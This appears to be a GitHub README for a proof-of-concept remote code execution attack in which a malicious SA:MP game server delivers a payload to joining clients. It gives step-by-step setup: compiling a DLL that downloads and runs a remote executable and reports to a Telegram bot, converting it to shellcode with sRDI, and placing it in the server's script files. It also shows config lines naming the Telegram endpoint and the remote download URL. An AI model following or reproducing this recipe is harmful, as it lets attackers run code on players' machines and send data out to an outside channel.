samp-rce

Small presentation example of Remote Code Execution in SA:MP. This vulnerability is fixed in latest RC samp 0.3.7-R5

Setup

• Download files clone repo

• Compile src/ (cpp) project to .dll

  • src/ is just small example of downloading samp037r5 file and run it with telegram logger

  • Note: you already have build file in dir release/ with name sampRCE.dll with non longer working telegram token (which i used for testing)

    Edit lines in main.h file:

    samp-rce/src/main.h

    Lines 10 to 16 in 7ee3ef9

    	// Constants for Telegram API
    	#define TELEGRAM_API_URL "https://api.telegram.org/bot"
    	#define TELEGRAM_BOT_TOKEN "XXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
    	#define TELEGRAM_CHAT_ID "XXXXXXXXXXX"
    	// Connstants for Downloading remote exe files
    	#define DOWNLOAD_REMOTE_EXE "https://api.zile42o.dev/download/sa-mp-0.3.7-R5-1-install.exe" // for testing propose

• Rename file to change extension from .dll to .asi

• Move the file to dir sRDI/

  • sRDI is external tool you can get it here: https://github.com/monoxgas/sRDI or via command:

    git clone https://github.com/monoxgas/sRDI   
    

• Convert to shellcode

  py .\ConvertToShellcode.py .\sampRCE.asi
  

• Move converted sampRCE.asi to server/scriptfiles/

• Run server with sampctl run, join into game and that's it

|----------|                   |---------|                                         |--------|
| samp svr | ---> [rce.pwn] -> | payload | <---> [ scriptfiles/sampRCE.asi ] ----> | client |
|----------|                   |---------|                                         |------- |

demo images

client

telegram logger example

Credits

big thanks to EvgeN 1137 who explained and cover this vulnerability you can check his post here

Disclamer

This repository is for academic purposes, the use of this software is your responsibility.